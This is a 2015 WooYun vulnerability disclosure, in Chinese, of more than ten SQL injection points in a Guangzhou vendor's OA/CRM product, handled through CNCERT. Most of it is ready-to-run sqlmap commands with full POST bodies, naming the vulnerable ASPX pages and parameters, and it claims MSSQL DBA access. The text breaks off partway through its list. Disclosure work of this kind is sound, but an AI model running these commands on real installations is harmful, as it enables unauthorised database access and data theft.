我要一网打尽某OA系统注入漏洞再来20处高危注入打包

发表于 2015年06月20日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0121216

漏洞标题：我要一网打尽某OA系统注入漏洞再来20处高危注入打包

相关厂商：国家互联网应急中心

漏洞作者：goubuli

提交时间：2015-06-20 10:32

公开时间：2015-09-21 08:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：

漏洞详情

披露状态：

2015-06-20: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认，细节仅向厂商公开
2015-06-26: 细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述：

RT
两种类型：GET注入和POST注入打包一起发
应该没有注入了，被我挖干净了。。。(￣▽￣)"

详细说明：

又是这么多提交的好累。。。挖的也好累啊。。。

厂商:广州市名将软件开发有限公司<br>
官网：http://**.**.**.**/index.asp<br>
官方演示demo：**.**.**.**:38888/<br>
原址：http://**.**.**.**<br>
demo测试，mssql注入，DBA权限。

厂商:广州市名将软件开发有限公司

官网：http://**.**.**.**/index.asp

官方演示demo：**.**.**.**:38888/

原址：http://**.**.**.**

demo测试，mssql注入，DBA权限。

给审核大神点个赞，这个漏洞审核太快了。。。http://**.**.**.**/bugs/wooyun-2010-0121176我这个还没提交完

不重复的注入漏洞：注入一、

sqlmap.py -u "**.**.**.**:38888/CRM/MyCustomNeed.aspx" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwUKLTg1OTA5MjgxMw9kFgJmD2QWBgIPDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAWQWAmYPZBYEAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgICAQ8PFgIeBFRleHQFATFkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFEk5lZWRWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDZGZnZAICDw8WAh8FBQUgZmdkZ2RkAgMPDxYCHwUFA2RmZ2RkAgQPDxYCHwUFA2RmZ2RkAgUPDxYCHwUFAmdkZGQCBg8PFgIfBQUCZGdkZAICDw8WAh4HVmlzaWJsZWhkZAIZDw8WAh8FBQExZGQCGw8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYLBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkWJ6Yz2XAgQ9Jn1lsamNxEmQpQ0k%3D&DropDownList1=NeedContent&TextBox1=d&ImageButton4.x=26&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWGwKMtcioDwK%2FyLvNDgKihNChCgKBxq7sDgKEy5dZAunOtdMDAq%2BZ%2BoUHAue0yIgEAp3hof8OAr6Ar9sKAt2G%2FcIOAq2hhkICssrl0wIC7NGy6wYC0sL9mgQC0sKZ0wgC0sLpvwsC0sLBiQoC0sLV5AICo8yu9ggC7v%2Fd4Q8C1prZ5QMClenzjgoCkem3jwkCuu2%2BrgICpLLVlgUC%2Bo6i9wlkZxA1t7YKOtF1j%2FkICG43F3980Q%3D%3D" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/CRM/MyCustomNeed.aspx" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwUKLTg1OTA5MjgxMw9kFgJmD2QWBgIPDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAWQWAmYPZBYEAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgICAQ8PFgIeBFRleHQFATFkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFEk5lZWRWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDZGZnZAICDw8WAh8FBQUgZmdkZ2RkAgMPDxYCHwUFA2RmZ2RkAgQPDxYCHwUFA2RmZ2RkAgUPDxYCHwUFAmdkZGQCBg8PFgIfBQUCZGdkZAICDw8WAh4HVmlzaWJsZWhkZAIZDw8WAh8FBQExZGQCGw8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYLBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkWJ6Yz2XAgQ9Jn1lsamNxEmQpQ0k%3D&DropDownList1=NeedContent&TextBox1=d&ImageButton4.x=26&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWGwKMtcioDwK%2FyLvNDgKihNChCgKBxq7sDgKEy5dZAunOtdMDAq%2BZ%2BoUHAue0yIgEAp3hof8OAr6Ar9sKAt2G%2FcIOAq2hhkICssrl0wIC7NGy6wYC0sL9mgQC0sKZ0wgC0sLpvwsC0sLBiQoC0sLV5AICo8yu9ggC7v%2Fd4Q8C1prZ5QMClenzjgoCkem3jwkCuu2%2BrgICpLLVlgUC%2Bo6i9wlkZxA1t7YKOtF1j%2FkICG43F3980Q%3D%3D" -p TextBox1

TextBox1存在POST注入

注入二、

sqlmap.py -u "**.**.**.**:38888/CRM/MySongYang.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwULLTE4ODMzODkwMDEPZBYCZg9kFgYCDw88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGQ8PFgIeBFRleHQFATFkZAIbDw8WAh8CBQEwZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgoFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkBbkbM1eruLsMm1cFLMg0GiKcB6U%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=23&ImageButton4.y=8&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWGAKZ2P%2F5DAK%2FyLvNDgKllePHCAKH%2F8WBDgLqvNPTDQLo5NPqAgLHrMH7DQKKpcrXCwKO6fqcCwKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJ9ZVcIIV%2B9rWMysuGJpH3gjstVKI%3D" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/CRM/MySongYang.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwULLTE4ODMzODkwMDEPZBYCZg9kFgYCDw88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGQ8PFgIeBFRleHQFATFkZAIbDw8WAh8CBQEwZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgoFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkBbkbM1eruLsMm1cFLMg0GiKcB6U%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=23&ImageButton4.y=8&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWGAKZ2P%2F5DAK%2FyLvNDgKllePHCAKH%2F8WBDgLqvNPTDQLo5NPqAgLHrMH7DQKKpcrXCwKO6fqcCwKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJ9ZVcIIV%2B9rWMysuGJpH3gjstVKI%3D" -p TextBox1

TextBox1存在POST注入

注入三、

sqlmap.py -u "**.**.**.**:38888/CRM/MyCustomHate.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTM5NzIxNjgwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2ThPqs2rydL4pxKWeqvpQcFMMq3Gg%3D%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=14&ImageButton4.y=3&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFQLk4ZnPCAK%2FyLvNDgKBsLzQCwLcgsVtAr3bqNwGAuydjIcPAq2hhkICssrl0wIC7NGy6wYC0sL9mgQC0sKZ0wgC0sLpvwsC0sLBiQoC0sLV5AIC7v%2Fd4Q8C1prZ5QMClenzjgoCkem3jwkCuu2%2BrgICpLLVlgUC%2Bo6i9wk7gHMuqX53jS4jILenuBfWIzb7eg%3D%3D" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/CRM/MyCustomHate.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTM5NzIxNjgwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2ThPqs2rydL4pxKWeqvpQcFMMq3Gg%3D%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=14&ImageButton4.y=3&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFQLk4ZnPCAK%2FyLvNDgKBsLzQCwLcgsVtAr3bqNwGAuydjIcPAq2hhkICssrl0wIC7NGy6wYC0sL9mgQC0sKZ0wgC0sLpvwsC0sLBiQoC0sLV5AIC7v%2Fd4Q8C1prZ5QMClenzjgoCkem3jwkCuu2%2BrgICpLLVlgUC%2Bo6i9wk7gHMuqX53jS4jILenuBfWIzb7eg%3D%3D" -p TextBox1

TextBox1存在POST注入

注入四、

sqlmap.py -u "**.**.**.**:38888/CRM/MyCustomBack.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTM5NzIxNjgwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2QMuetnJRHpNX%2BCRAJ5%2BxtTe9ANgQ%3D%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=22&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFQL4r7rYCgK%2FyLvNDgLxkp2pBwLSzcTNDgL7tqfgBgLCzZjMDgKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJVMjI%2FZGa2ooRTzgtCMPCWXjgxEA%3D" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/CRM/MyCustomBack.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTM5NzIxNjgwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2QMuetnJRHpNX%2BCRAJ5%2BxtTe9ANgQ%3D%3D&DropDownList1=CustomName&TextBox1=a&ImageButton4.x=22&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWFQL4r7rYCgK%2FyLvNDgLxkp2pBwLSzcTNDgL7tqfgBgLCzZjMDgKtoYZCArLK5dMCAuzRsusGAtLC%2FZoEAtLCmdMIAtLC6b8LAtLCwYkKAtLC1eQCAu7%2F3eEPAtaa2eUDApXp844KApHpt48JArrtvq4CAqSy1ZYFAvqOovcJVMjI%2FZGa2ooRTzgtCMPCWXjgxEA%3D" -p TextBox1

TextBox1存在POST注入

注入五、

sqlmap.py -u "**.**.**.**:38888/Supply/BuyLog.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAmQWAmYPZBYGAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATJkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFGEJ1eUNoYW5QaW5WaWV3LmFzcHg%2FSUQ9MmQWAmYPFQEG5Lq65Y%2BCZAICDw8WAh8FBQZkZmRmZGZkZAIDDw8WAh8FBQU0NS4wMGRkAgQPDxYCHwUFBTQ1LjAwZGQCBQ8PFgIfBQUHNDU0NS4wMGRkAgYPDxYCHwUFBTQ1LjAwZGQCBw8PFgIfBQUHNDU1NS4wMGRkAggPDxYCHwUFCeacquS6pOS7mGRkAgIPD2QWBB8DBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8EBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIfBQUBMWRkAgEPZBYCAgEPDxYCHwYFGEJ1eUNoYW5QaW5WaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDc2RmZAICDw8WAh8FBQVzZGZzZGRkAgMPDxYCHwUFBTIxLjAwZGQCBA8PFgIfBQUFMTIuMDBkZAIFDw8WAh8FBQUxMi4wMGRkAgYPDxYCHwUFBTEyLjAwZGQCBw8PFgIfBQUFMTIuMDBkZAIIDw8WAh8FBQnmnKrkuqTku5hkZAIDDw8WAh4HVmlzaWJsZWhkZAIWDw8WAh8FBQExZGQCGA8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYMBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BRhHVkRhdGEkY3RsMDMkQ2hlY2tTZWxlY3QFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2Qc9wtPFis%2BzWutehswyKBxcS%2FFOA%3D%3D&TextBox1=a&ImageButton4.x=26&ImageButton4.y=7&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKHn9L8CgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CRAs2InAwbiXBy5WDDjVCXekL7Jo" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/Supply/BuyLog.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAmQWAmYPZBYGAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATJkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFGEJ1eUNoYW5QaW5WaWV3LmFzcHg%2FSUQ9MmQWAmYPFQEG5Lq65Y%2BCZAICDw8WAh8FBQZkZmRmZGZkZAIDDw8WAh8FBQU0NS4wMGRkAgQPDxYCHwUFBTQ1LjAwZGQCBQ8PFgIfBQUHNDU0NS4wMGRkAgYPDxYCHwUFBTQ1LjAwZGQCBw8PFgIfBQUHNDU1NS4wMGRkAggPDxYCHwUFCeacquS6pOS7mGRkAgIPD2QWBB8DBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8EBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIfBQUBMWRkAgEPZBYCAgEPDxYCHwYFGEJ1eUNoYW5QaW5WaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDc2RmZAICDw8WAh8FBQVzZGZzZGRkAgMPDxYCHwUFBTIxLjAwZGQCBA8PFgIfBQUFMTIuMDBkZAIFDw8WAh8FBQUxMi4wMGRkAgYPDxYCHwUFBTEyLjAwZGQCBw8PFgIfBQUFMTIuMDBkZAIIDw8WAh8FBQnmnKrkuqTku5hkZAIDDw8WAh4HVmlzaWJsZWhkZAIWDw8WAh8FBQExZGQCGA8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYMBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BRhHVkRhdGEkY3RsMDMkQ2hlY2tTZWxlY3QFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2Qc9wtPFis%2BzWutehswyKBxcS%2FFOA%3D%3D&TextBox1=a&ImageButton4.x=26&ImageButton4.y=7&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKHn9L8CgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CRAs2InAwbiXBy5WDDjVCXekL7Jo" -p TextBox1

TextBox1存在POST注入

注入六、

sqlmap.py -u "**.**.**.**:38888/Project/ShiShiRiZhi.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkAhYPDxYCHgRUZXh0BQExZGQCGA8PFgIfAgUBMGRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYKBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ9nZCHcz8kyvxhMS0bB96rUVgXWRwTO&TextBox1=abc&ImageButton4.x=19&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgKZ1qS9AQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CRSSXtGvMZJxYdVngKONF3%2Fkh199" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/Project/ShiShiRiZhi.aspx" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkAhYPDxYCHgRUZXh0BQExZGQCGA8PFgIfAgUBMGRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYKBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ9nZCHcz8kyvxhMS0bB96rUVgXWRwTO&TextBox1=abc&ImageButton4.x=19&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgKZ1qS9AQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CRSSXtGvMZJxYdVngKONF3%2Fkh199" -p TextBox1

TextBox1存在POST注入

注入七、

sqlmap.py -u "**.**.**.**:38888/Project/ShouKuan.aspx?ProjectName=" --dbms="mssql" --batch --dbs<br>
ProjectName注入

1 2	sqlmap.py -u "...:38888/Project/ShouKuan.aspx?ProjectName=" --dbms="mssql" --batch --dbs<br> ProjectName注入

注入八、

sqlmap.py -u "**.**.**.**:38888/Project/ShouKuan.aspx?ProjectName=" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIWDw8WAh4EVGV4dAUBMWRkAhgPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2TWfrWXa7Z4Q5q4uAW%2FRDr6vRCFkg%3D%3D&TextBox1=abc&ImageButton4.x=31&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgK8lsXSDgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CQY1AT1VSwATlrGbpmZavKKaulyh" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/Project/ShouKuan.aspx?ProjectName=" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIWDw8WAh4EVGV4dAUBMWRkAhgPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2TWfrWXa7Z4Q5q4uAW%2FRDr6vRCFkg%3D%3D&TextBox1=abc&ImageButton4.x=31&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgK8lsXSDgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CQY1AT1VSwATlrGbpmZavKKaulyh" -p TextBox1

TextBox1存在POST注入

注入九、

sqlmap.py -u "**.**.**.**:38888/Project/LiRuiGuanLi.aspx?ProjectName=" --dbms="mssql" --batch --dbs<br>
ProjectName存在注入

1 2	sqlmap.py -u "...:38888/Project/LiRuiGuanLi.aspx?ProjectName=" --dbms="mssql" --batch --dbs<br> ProjectName存在注入

注入十、

sqlmap.py -u "**.**.**.**:38888/Project/LiRuiGuanLi.aspx?ProjectName=" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwULLTExOTM1Mjc1NzYPZBYCZg9kFgYCDA88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCFg8PFgIeBFRleHQFATFkZAIYDw8WAh8CBQEwZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgoFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkJjBlmE6L8Xs%2FINq88smT0psJeSk%3D&TextBox1=abc&ImageButton4.x=30&ImageButton4.y=7&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgKjlre5BALs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3Cbx%2BgsItWEB2Ut1NImQ7DCLeN0xP" -p TextBox1<br>
TextBox1存在POST注入

